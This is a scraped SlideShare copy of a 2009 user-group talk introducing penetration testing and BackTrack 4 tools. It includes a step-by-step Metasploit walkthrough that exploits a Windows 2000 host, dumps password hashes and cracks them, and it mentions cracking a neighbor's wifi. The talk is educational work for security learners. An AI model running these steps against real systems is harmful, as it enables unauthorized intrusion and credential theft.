SlideShare una empresa de Scribd logo
1 de 24
Descargar para leer sin conexión
Hack Attack!
An Introduction to Penetration Testing




    Steve Phillips (aka fraktil)
     2009.12.17 @ SBLUG
Who Am I?
●   Attended UCSB 2004-2008
    –   Majored in Math and Philosophy, not CS
●   Started using Linux in 2001
    –   Mandrake, then Slackware, then Debian
●   Applying for penetration testing job in January
●   Biases/“Preferences”
    –   Linux > Windoze (duh)
    –   Python > Ruby
    –   Emacs > vi
    –   Debian (and variants) > others
Can Hacking Be Ethical?
                Or, what is Ethical Hacking?

●   Black Hat
    –   Compromises computer systems without permission
    –   Criminal
●   White Hat, aka Ethical Hacker
    –   Gets paid to hack – legally (friggin' sweet)
    –   Always gets permission before attacking a system
●   Gray Hat
    –   Some combination of Black and White
The Stages of Hackerdom
●   Script Kiddie (“skiddie”)
    –   Can only run automated tools
    –   Doesn't understand underlying technology
●   Advanced Beginner
    –   Mastered advanced features of many tools
    –   Knows enough programming to create own tools
         ●   C => Python, Ruby (see next slide)
●   Uberhacker
    –   Discovers new vulnerabilities (or new types of vulns)
    –   Knows Assembly, C, Python and/or Ruby, SQL
    –   Excellent programmer; writes tools, scripts regularly
    –   Can defend as well as attack (firewalls, IDS, etc)
Programming Languages Used to
     Create Hacking Tools
●   C
    –   Nmap (network mapper, portscanner, more)
    –   Nessus (vulnerability detection)
    –   Wireshark (network sniffer)
●   Python
    –   w3af (web app attack framework)
    –   sqlmap (automatic SQL injection)
    –   TheMiddler (session hijacking, targeted pw sniffing)
●   Ruby
    –   Metasploit (vuln exploitation, much more)
What About in Back|Track 4?
                    Overall: Tools + Exploits
●   File count: find /pentest | grep .c$ | wc -l
●   Line count: cat $(find /pentest | grep .c$) | wc -l

●   C:      4058 .c files             1,300,000 lines
●   Python: 2431 .py files              612,000 lines
●   Ruby: 5468 .rb files                694,000 lines
        ●   2773 files from Metasploit
        ●   1271 files from Dradis (information organizing, sharing)
        ●   1424 other
●   C++:        431 .cpp files              144,000 lines
What About in Back|Track 4?
                Exploits Only (from exploitdb)

●   C
    –   1321 .c files
●   Python
    –   405 .py files
●   Ruby
    –   146 .rb files
●   C++
    –   110 .cpp files
TIOBE Index
Programming Language Popularity
Back|Track 4 Categories
●   Information Gathering
    –   Email addresses, DNS
●   Network Mapping
●   Vulnerability Identification
●   Web Application Analysis
●   Radio Network Analysis
●   Penetration (not that kind)
Back|Track 4 Categories
●   Privilege Escalation
●   Maintaining Access
●   Digital Forensics
●   Reverse Engineering
●   VoIP (Voice over Internet Protocol)
●   Misc
DEMO: Sniffing Passwords
             with Ettercap
●   ARP Poisoning for MitM Attack
    –   Associate attacker's MAC with router's IP
    –   Target tries to route traffic through router
         ●   Routes it through attacker instead
    –   Attacker forwards traffic both ways
    –   Attacker can silently watch or inject traffic
         ●   TheMiddler, sslstrip
How Else Can We Get Creds?
●   Phishing
    –   Via email
●   Spear Phishing
    –   Becoming popular
    –   Very hard to stop
●   In-person Social Engineering
    –   Kevin Mitnick is famous for this
●   Brute force
DEMO: Bruteforcing FTP
●   Using Hydra to bruteforce weak FTP password
    –   Well, really a dictionary attack
DEMO: Pwning Win2k
●   Create database (or connect to existing)
    –   db_create [optional_database_name]
●   Find win2k box using nmap (in metasploit)
    –   db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24
●   Search Metasploit for win2k exploits
    –   search 2000
●   Use exploit w/meterpreter
    –   use exploit/windows/smb/ms05_039_pnp
    –   set PAYLOAD windows/meterpreter/bind_tcp
●   Which parameters still need to be set?
    –   show options
DEMO: Pwning Win2k
●   Set parameters
    –   set RHOST [target_ip]
●   Now we exploit! Can you guess the command?
    –   exploit
●   Get hashes
    –   hashdump
    –   This would be much harder without meterpreter!
●   Copy and paste hashes into new text file
●   Crack hashes with john the ripper
    –   ./john [file_containing_hashes].txt
●   Game Over
Why Become an Ethical Hacker?
●   Field is growing (see next slide)
    –   New laws, regulations
    –   US government falling behind in cyber security

●   You get paid to hack – need I say more?
    –   Banks
    –   Telecoms
    –   Casinos
    –   Foreign countries (for the federal gov't)
How Can I Practice Legally?
●   Virtualization (VMware, VirtualBox)
    –   Use virtual images from recent CTF competitions
         ●   http://lampsecurity.org/capture-the-flag-6
         ●   http://ctf.hcesperer.org/25c3ctf
         ●   http://ctf.hcesperer.org/daopen08
         ●   http://ctf.hcesperer.org/eh08ctf
●   NetWars
    –   Part of government's Cyber Defense Initiative 2009
●   DVL: Damn Vulnerable Linux
    –   Purposely misconfigured, exploitable
    –   http://tinyurl.com/dvllinux15
Further Resources
                           Learning

●   Metasploit
    –   Online Class: http://www.offensive-
        security.com/metasploit-unleashed/
●   Nmap Guide
    –   http://nmap.org/book/man.html
●   Security Videos, Tutorials
    –   http://securitytube.net
Tools Added to Back|Track
                  Extra Tools I Used

●   Metasploit 3.3.2 (updated)
●   Nmap 5.0 (updated)

●   Exploitdb archive (/pentest/exploits/exlpoitdb)
Summary
●   Hacking can be ethical
●   “Computer security” is an oxymoron
    –   No one is safe
●   REALLY powerful hacking tools exist
●   Metasploit is effing dangerous
Future Demos?
●   More local fun
    –   Crack neighbor's wifi (WEP)
    –   Exploit remote vuln in DD-WRT firmware
    –   Redirecting traffic using fake DNS server
    –   Intercepting Twitter, Facebook, LinkedIn creds
●   More like real pen testing
    –   SQL injection
    –   XSS
    –   Nessus scan
Contact Information
●   Name:       Steve Phillips
●   New Blog:   SweetHack.blogspot.com
●   Email:      fraktil@gmail.com
●   Twitter:    twitter.com/fraktil
●   LinkedIn:   linkedin.com/in/sdphillips
●   IRC:        fraktil in #sblug on borg-cube.com
Questions?

Más contenido relacionado

La actualidad más candente

Web Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to GoWeb Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to GoGene Gotimer
 
(03 2013) guide to kali linux
(03 2013)   guide to kali linux(03 2013)   guide to kali linux
(03 2013) guide to kali linuxjulius77
 
Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014TGodfrey
 
Shamsa altayer 10bg kali linux
Shamsa altayer 10bg   kali linuxShamsa altayer 10bg   kali linux
Shamsa altayer 10bg kali linuxshamsaot
 
Kali Linux - CleveSec 2015
Kali Linux - CleveSec 2015Kali Linux - CleveSec 2015
Kali Linux - CleveSec 2015TGodfrey
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
BASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXBASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXDeborah Akuoko
 
Kali tools list with short description
Kali tools list with short descriptionKali tools list with short description
Kali tools list with short descriptionJose Moruno Cadima
 
Learn Ethical Hacking With Kali Linux | Ethical Hacking Tutorial | Kali Linux...
Learn Ethical Hacking With Kali Linux | Ethical Hacking Tutorial | Kali Linux...Learn Ethical Hacking With Kali Linux | Ethical Hacking Tutorial | Kali Linux...
Learn Ethical Hacking With Kali Linux | Ethical Hacking Tutorial | Kali Linux...Edureka!
 
Parrot Security OS | Introduction to Parrot Security OS | Cybersecurity Train...
Parrot Security OS | Introduction to Parrot Security OS | Cybersecurity Train...Parrot Security OS | Introduction to Parrot Security OS | Cybersecurity Train...
Parrot Security OS | Introduction to Parrot Security OS | Cybersecurity Train...Edureka!
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 

La actualidad más candente (20)

Web Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to GoWeb Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to Go
 
(03 2013) guide to kali linux
(03 2013)   guide to kali linux(03 2013)   guide to kali linux
(03 2013) guide to kali linux
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
kali linux.pptx
kali linux.pptxkali linux.pptx
kali linux.pptx
 
Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014
 
Kali linux
Kali linuxKali linux
Kali linux
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Kali linux
Kali linuxKali linux
Kali linux
 
Kali linux
Kali linuxKali linux
Kali linux
 
Shamsa altayer 10bg kali linux
Shamsa altayer 10bg   kali linuxShamsa altayer 10bg   kali linux
Shamsa altayer 10bg kali linux
 
Kali Linux - CleveSec 2015
Kali Linux - CleveSec 2015Kali Linux - CleveSec 2015
Kali Linux - CleveSec 2015
 
kali linux
kali linuxkali linux
kali linux
 
Kali linux
Kali linuxKali linux
Kali linux
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
BASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXBASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUX
 
Kali tools list with short description
Kali tools list with short descriptionKali tools list with short description
Kali tools list with short description
 
Learn Ethical Hacking With Kali Linux | Ethical Hacking Tutorial | Kali Linux...
Learn Ethical Hacking With Kali Linux | Ethical Hacking Tutorial | Kali Linux...Learn Ethical Hacking With Kali Linux | Ethical Hacking Tutorial | Kali Linux...
Learn Ethical Hacking With Kali Linux | Ethical Hacking Tutorial | Kali Linux...
 
Parrot Security OS | Introduction to Parrot Security OS | Cybersecurity Train...
Parrot Security OS | Introduction to Parrot Security OS | Cybersecurity Train...Parrot Security OS | Introduction to Parrot Security OS | Cybersecurity Train...
Parrot Security OS | Introduction to Parrot Security OS | Cybersecurity Train...
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 

Similar a Hack Attack! An Introduction to Penetration Testing

HITB2013AMS Defenting the enterprise, a russian way!
HITB2013AMS Defenting the enterprise, a russian way!HITB2013AMS Defenting the enterprise, a russian way!
HITB2013AMS Defenting the enterprise, a russian way!F _
 
honeypots.ppt
honeypots.ppthoneypots.ppt
honeypots.pptDetSersi
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleGuardicore
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
Analisis Estatico y de Comportamiento de un Binario Malicioso
Analisis Estatico y de Comportamiento de un Binario MaliciosoAnalisis Estatico y de Comportamiento de un Binario Malicioso
Analisis Estatico y de Comportamiento de un Binario MaliciosoConferencias FIST
 
Red Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceRed Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceDon Anto
 
Pay attention to that man behind the curtain: Current state of Hacking Back
Pay attention to that man behind the curtain: Current state of Hacking BackPay attention to that man behind the curtain: Current state of Hacking Back
Pay attention to that man behind the curtain: Current state of Hacking Backx0rz x0rz
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat Security Conference
 
Advanced Persistent Threats
Advanced Persistent ThreatsAdvanced Persistent Threats
Advanced Persistent ThreatsESET
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringbartblaze
 
Talk28oct14
Talk28oct14Talk28oct14
Talk28oct14mjos
 
Wireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit RanjanWireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit RanjanOWASP Delhi
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationSatria Ady Pradana
 

Similar a Hack Attack! An Introduction to Penetration Testing (20)

ETHICAL HACKING
ETHICAL HACKING ETHICAL HACKING
ETHICAL HACKING
 
Introduction to Exploitation
Introduction to ExploitationIntroduction to Exploitation
Introduction to Exploitation
 
HITB2013AMS Defenting the enterprise, a russian way!
HITB2013AMS Defenting the enterprise, a russian way!HITB2013AMS Defenting the enterprise, a russian way!
HITB2013AMS Defenting the enterprise, a russian way!
 
honeypots.ppt
honeypots.ppthoneypots.ppt
honeypots.ppt
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at Scale
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Analisis Estatico y de Comportamiento de un Binario Malicioso
Analisis Estatico y de Comportamiento de un Binario MaliciosoAnalisis Estatico y de Comportamiento de un Binario Malicioso
Analisis Estatico y de Comportamiento de un Binario Malicioso
 
Path of Cyber Security
Path of Cyber SecurityPath of Cyber Security
Path of Cyber Security
 
Path of Cyber Security
Path of Cyber SecurityPath of Cyber Security
Path of Cyber Security
 
Red Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceRed Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in Cyberspace
 
Pay attention to that man behind the curtain: Current state of Hacking Back
Pay attention to that man behind the curtain: Current state of Hacking BackPay attention to that man behind the curtain: Current state of Hacking Back
Pay attention to that man behind the curtain: Current state of Hacking Back
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
 
Advanced Persistent Threats
Advanced Persistent ThreatsAdvanced Persistent Threats
Advanced Persistent Threats
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineering
 
Talk28oct14
Talk28oct14Talk28oct14
Talk28oct14
 
Comprehensive guide for compromising network devices.
Comprehensive guide for compromising network devices.Comprehensive guide for compromising network devices.
Comprehensive guide for compromising network devices.
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Wireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit RanjanWireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit Ranjan
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming Operation
 

Último

Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfhans926745
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 

Último (20)

Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 

Hack Attack! An Introduction to Penetration Testing

  • 1. Hack Attack! An Introduction to Penetration Testing Steve Phillips (aka fraktil) 2009.12.17 @ SBLUG
  • 2. Who Am I? ● Attended UCSB 2004-2008 – Majored in Math and Philosophy, not CS ● Started using Linux in 2001 – Mandrake, then Slackware, then Debian ● Applying for penetration testing job in January ● Biases/“Preferences” – Linux > Windoze (duh) – Python > Ruby – Emacs > vi – Debian (and variants) > others
  • 3. Can Hacking Be Ethical? Or, what is Ethical Hacking? ● Black Hat – Compromises computer systems without permission – Criminal ● White Hat, aka Ethical Hacker – Gets paid to hack – legally (friggin' sweet) – Always gets permission before attacking a system ● Gray Hat – Some combination of Black and White
  • 4. The Stages of Hackerdom ● Script Kiddie (“skiddie”) – Can only run automated tools – Doesn't understand underlying technology ● Advanced Beginner – Mastered advanced features of many tools – Knows enough programming to create own tools ● C => Python, Ruby (see next slide) ● Uberhacker – Discovers new vulnerabilities (or new types of vulns) – Knows Assembly, C, Python and/or Ruby, SQL – Excellent programmer; writes tools, scripts regularly – Can defend as well as attack (firewalls, IDS, etc)
  • 5. Programming Languages Used to Create Hacking Tools ● C – Nmap (network mapper, portscanner, more) – Nessus (vulnerability detection) – Wireshark (network sniffer) ● Python – w3af (web app attack framework) – sqlmap (automatic SQL injection) – TheMiddler (session hijacking, targeted pw sniffing) ● Ruby – Metasploit (vuln exploitation, much more)
  • 6. What About in Back|Track 4? Overall: Tools + Exploits ● File count: find /pentest | grep .c$ | wc -l ● Line count: cat $(find /pentest | grep .c$) | wc -l ● C: 4058 .c files 1,300,000 lines ● Python: 2431 .py files 612,000 lines ● Ruby: 5468 .rb files 694,000 lines ● 2773 files from Metasploit ● 1271 files from Dradis (information organizing, sharing) ● 1424 other ● C++: 431 .cpp files 144,000 lines
  • 7. What About in Back|Track 4? Exploits Only (from exploitdb) ● C – 1321 .c files ● Python – 405 .py files ● Ruby – 146 .rb files ● C++ – 110 .cpp files
  • 9. Back|Track 4 Categories ● Information Gathering – Email addresses, DNS ● Network Mapping ● Vulnerability Identification ● Web Application Analysis ● Radio Network Analysis ● Penetration (not that kind)
  • 10. Back|Track 4 Categories ● Privilege Escalation ● Maintaining Access ● Digital Forensics ● Reverse Engineering ● VoIP (Voice over Internet Protocol) ● Misc
  • 11. DEMO: Sniffing Passwords with Ettercap ● ARP Poisoning for MitM Attack – Associate attacker's MAC with router's IP – Target tries to route traffic through router ● Routes it through attacker instead – Attacker forwards traffic both ways – Attacker can silently watch or inject traffic ● TheMiddler, sslstrip
  • 12. How Else Can We Get Creds? ● Phishing – Via email ● Spear Phishing – Becoming popular – Very hard to stop ● In-person Social Engineering – Kevin Mitnick is famous for this ● Brute force
  • 13. DEMO: Bruteforcing FTP ● Using Hydra to bruteforce weak FTP password – Well, really a dictionary attack
  • 14. DEMO: Pwning Win2k ● Create database (or connect to existing) – db_create [optional_database_name] ● Find win2k box using nmap (in metasploit) – db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24 ● Search Metasploit for win2k exploits – search 2000 ● Use exploit w/meterpreter – use exploit/windows/smb/ms05_039_pnp – set PAYLOAD windows/meterpreter/bind_tcp ● Which parameters still need to be set? – show options
  • 15. DEMO: Pwning Win2k ● Set parameters – set RHOST [target_ip] ● Now we exploit! Can you guess the command? – exploit ● Get hashes – hashdump – This would be much harder without meterpreter! ● Copy and paste hashes into new text file ● Crack hashes with john the ripper – ./john [file_containing_hashes].txt ● Game Over
  • 16. Why Become an Ethical Hacker? ● Field is growing (see next slide) – New laws, regulations – US government falling behind in cyber security ● You get paid to hack – need I say more? – Banks – Telecoms – Casinos – Foreign countries (for the federal gov't)
  • 17.
  • 18. How Can I Practice Legally? ● Virtualization (VMware, VirtualBox) – Use virtual images from recent CTF competitions ● http://lampsecurity.org/capture-the-flag-6 ● http://ctf.hcesperer.org/25c3ctf ● http://ctf.hcesperer.org/daopen08 ● http://ctf.hcesperer.org/eh08ctf ● NetWars – Part of government's Cyber Defense Initiative 2009 ● DVL: Damn Vulnerable Linux – Purposely misconfigured, exploitable – http://tinyurl.com/dvllinux15
  • 19. Further Resources Learning ● Metasploit – Online Class: http://www.offensive- security.com/metasploit-unleashed/ ● Nmap Guide – http://nmap.org/book/man.html ● Security Videos, Tutorials – http://securitytube.net
  • 20. Tools Added to Back|Track Extra Tools I Used ● Metasploit 3.3.2 (updated) ● Nmap 5.0 (updated) ● Exploitdb archive (/pentest/exploits/exlpoitdb)
  • 21. Summary ● Hacking can be ethical ● “Computer security” is an oxymoron – No one is safe ● REALLY powerful hacking tools exist ● Metasploit is effing dangerous
  • 22. Future Demos? ● More local fun – Crack neighbor's wifi (WEP) – Exploit remote vuln in DD-WRT firmware – Redirecting traffic using fake DNS server – Intercepting Twitter, Facebook, LinkedIn creds ● More like real pen testing – SQL injection – XSS – Nessus scan
  • 23. Contact Information ● Name: Steve Phillips ● New Blog: SweetHack.blogspot.com ● Email: fraktil@gmail.com ● Twitter: twitter.com/fraktil ● LinkedIn: linkedin.com/in/sdphillips ● IRC: fraktil in #sblug on borg-cube.com